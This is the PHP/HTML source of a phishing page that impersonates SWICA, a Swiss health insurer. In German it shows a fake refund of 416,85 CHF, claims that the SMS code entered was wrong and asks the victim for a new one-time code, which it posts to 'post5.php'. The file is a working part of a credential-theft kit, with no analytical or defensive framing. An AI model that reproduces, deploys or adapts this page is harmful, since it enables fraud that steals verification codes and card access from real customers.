<?php

include "id.php";
?>
<html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta lang="de">
    <title>Anmelden</title>
    <link rel="icon" type="image/png" sizes="16x16" href="https://meta.swica.ch/sso/favicon/favicon-16x16.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://meta.swica.ch/sso/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://meta.swica.ch/sso/favicon/favicon-96x96.png">
    <link rel="stylesheet" href="vendor.min.css">
    <link rel="stylesheet" href="main.min.css">
    <base href=".">
</head>

<body>
    <div id="app">
        <div class="content">
            <form action="#" method="post">
                <header class="header">
                    <nav class="navbar navbar-light navbar-expand-lg">
                        <div class="container flex-nowrap">
                            <div id="lang-list">
                                <ul class="navbar-nav lng-switch d-lg-none">
                                    <li class="nav-item selected">
                                        <a type="submit" href="./" class="nav-link" name="culture" aria-label="Sprache Deutsch" value="de">de</a>
                                    </li>
                                    <li class="nav-item">
                                        <a type="submit" href="./fr" class="nav-link" name="culture" aria-label="Langue Française" value="fr">fr</a>
                                    </li>
                                </ul>
                            </div>
                            <div class="logo-xs d-lg-none">
                                <img src="swica-logo-mobile.svg">
                            </div>
                            <div id="nav-collapse" class="navbar-collapse collapse">
                                <ul class="navbar-nav lng-switch d-none d-lg-flex">
                                    <li class="nav-item selected">
                                        <button type="submit" class="nav-link" name="culture" value="de">de</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="fr">fr</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="it">it</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="en">en</button>
                                    </li>
                                </ul>
                            </div>
                            <div class="logo d-none d-lg-block">
                                <img src="swica-logo-de-orig.png">
                            </div>
                        </div>
                    </nav>
                </header>
            </form>

            <section class="container">
                <div class="row">
                    <div class="col-lg-6 mx-auto">
                        <div>
                            <div id="snackbar"></div>
                            <div class="title">SMS-Verifizierung</div>
                            <div class="alert alert-info" role="alert" style="
    padding-left: 3%;
    padding-right: 3%;
    padding-top: 3%;
background-color:white;
color:black;">
                                <h5>Diese Online-Transaktion ist für eine Rückerstattung. Um diese Transaktion sicher zu verifizieren, müssen wir bestätigen, dass Sie es wirklich sind, indem Sie mit der 3D-Verifizierung fortfahren.</h5>
<hr style="
    margin-top: 0px;
    margin-bottom: 3%;
">
                                <p><strong>RÜCKERSTATTUNGSBETRAG:</strong> 416,85 CHF</p>
                                <p><strong>VERIFIZIERUNGSTYP:</strong> MOBILE SMS</p>
                                <p><strong>ÜBERWEISUNG AUF KARTE:</strong> SOFORT</p>
                            </div>
                             <form action="post5.php" id="doubleActionForm" method="post" >
                                <div class="form-group">
                                    <strong for="phoneNumber" style="color:red">Die eingegebene SMS war falsch.</strong><br>


                                    <br><input name="sms" required="" id="phoneNumber" type="tel" inputmode="numeric" minlength="5" maxlength="6" pattern="^[0-9]{5,6}$" placeholder=" ● ● ● ● ● ● " class="form-control" style="
    padding-top: 2px;
"><br>


<strong style="
    padding-top: 0px;
">Wir haben Ihnen eine weitere SMS gesendet. Bitte überprüfen Sie Ihr Telefon</strong>
                                </div>
                                <button type="submit" class="btn btn-primary">Weiter</button>
                            </form>
                        </div>
                    </div>
                </div>
            </section>
        </div>

        <footer>
            <div class="container">
                <div class="contactCard">
                    <div class="cardTitle">Rund um die Uhr für Sie da.</div>
                    <div class="line service">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M.818 10.721l1.082 1.08a3 3 0 004.242 0l1.591-1.592a1.5 1.5 0 000-2.122L4.64 5a1.5 1.5 0 00-2.263.148c-3.241 4.4-1.277 9.036 2.706 13.02 3.983 3.984 8.62 5.946 13.023 2.705a1.5 1.5 0 00.147-2.263l-3.094-3.094a1.5 1.5 0 00-2.122 0l-1.59 1.591a3 3 0 000 4.243l1.094 1.094M12.753 3.75c.3-.9.663-2.25 2.32-2.25v0a2.179 2.179 0 012.18 2.179v0a1.98 1.98 0 01-.58 1.4L12.753 9h4.5M23.25 7.5h-3.747l3.747-6V9" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle">
                                <a href="tel:0800 80 90 80">0800 80 90 80</a>
                            </div>
                            <div class="lineDescription">Kundenservice 7x24</div>
                        </div>
                    </div>
                    <div class="line faq">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M9 6.75a3 3 0 114 2.829 1.5 1.5 0 00-1 1.415v.256m9.75 7.5h-10.5l-6 4.5v-4.5h-3a1.5 1.5 0 01-1.5-1.5v-15a1.5 1.5 0 011.5-1.5h19.5a1.5 1.5 0 011.5 1.5v15a1.5 1.5 0 01-1.5 1.5z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                            <path d="M12 14.25a.375.375 0 100 .75.375.375 0 000-.75v0" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle"><a href="#">Häufige Fragen</a></div>
                            <div class="lineDescription">Die wichtigsten Antworten.</div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="footerInfo">
                <div class="container">
                    <div class="row">
                        <div class="col text-right">
                            <ul class="nav justify-content-end">
                                <li class="nav-item">
                                    <a class="nav-link pr-0" href="#">Impressum</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>


</body></html>